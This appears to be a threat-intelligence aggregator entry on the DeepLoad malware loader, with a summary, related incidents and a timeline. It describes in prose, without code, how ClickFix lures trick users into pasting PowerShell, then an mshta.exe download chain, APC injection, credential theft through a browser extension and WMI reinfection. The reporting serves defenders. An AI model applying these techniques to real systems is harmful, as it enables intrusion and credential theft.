DeepLoad ClickFix loader with browser-credential theft and WMI reinfection
Malware Activity
Summary
Hide ▲
Show ▼
The DeepLoad malware loader now uses ClickFix delivery to compromise Windows hosts, raising the risk of credential theft and reinfection. It abuses mshta.exe, obfuscated PowerShell, and APC injection to evade detection while hiding in a process named LockAppHost.exe. The loader also steals browser passwords, captures sessions, and can persist across user logins unless the malicious extension is removed. Its WMI reinfection behavior lets it return to a supposedly clean host days later, extending exposure and complicating remediation.
Related Happenings
DeepLoad credential-stealing malware activity with WMI persistence
Malware Activity
First: 31.03.2026 00:25
Last: 31.03.2026 00:25
Sources 1
About this happening:
The **DeepLoad** malware strain is stealing credentials immediately after infection, exposing **stored browser passwords**, **live keystrokes**, and **active accounts** in **enter...
DeepLoad credential-stealing malware activity with WMI persistence
Malware ActivityAbout this happening: The **DeepLoad** malware strain is stealing credentials immediately after infection, exposing **stored browser passwords**, **live keystrokes**, and **active accounts** in **enter...
DeepLoad malware uses ClickFix, AI obfuscation, and WMI persistence
Malware Activity
First: 30.03.2026 15:00
Last: 30.03.2026 15:00
Sources 1
About this happening:
The **DeepLoad** malware family is actively using **ClickFix** lures and **AI-generated obfuscation** to steal **enterprise credentials** from **Windows** systems, increasing the...
DeepLoad malware uses ClickFix, AI obfuscation, and WMI persistence
Malware ActivityAbout this happening: The **DeepLoad** malware family is actively using **ClickFix** lures and **AI-generated obfuscation** to steal **enterprise credentials** from **Windows** systems, increasing the...
ClickFix fake CAPTCHA campaign delivering Amatera
Campaign
First: 26.01.2026 23:42
Last: 26.01.2026 23:42
Sources 1
About this happening:
A **ClickFix** campaign now uses a **fake CAPTCHA** and a signed **Microsoft App-V** script to deliver **Amatera** to **Windows** victims, raising the risk of credential theft and...
ClickFix fake CAPTCHA campaign delivering Amatera
CampaignAbout this happening: A **ClickFix** campaign now uses a **fake CAPTCHA** and a signed **Microsoft App-V** script to deliver **Amatera** to **Windows** victims, raising the risk of credential theft and...
Timeline
-
30.03.2026 18:47 2 articles · 1mo ago
DeepLoad ClickFix campaign disclosed
Initial DisclosureReliaQuest disclosed a new ClickFix campaign that distributes the previously undocumented DeepLoad loader through a lure that prompts users to paste PowerShell commands into the Windows Run dialog, leading to an mshta.exe download-and-execute chain and obfuscated PowerShell that conceals its functionality. DeepLoad blends into Windows activity by hiding payload behavior inside LockAppHost.exe, disabling PowerShell command history, using APC injection to run its main payload in a trusted process, and stealing browser passwords and sessions through a malicious browser extension that persists across logins. The loader also uses WMI event subscription to reinfect a clean host three days later, extending persistence and complicating removal.
Show sources
- DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials — thehackernews.com — 30.03.2026 18:47
- DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials — thehackernews.com — 30.03.2026 18:47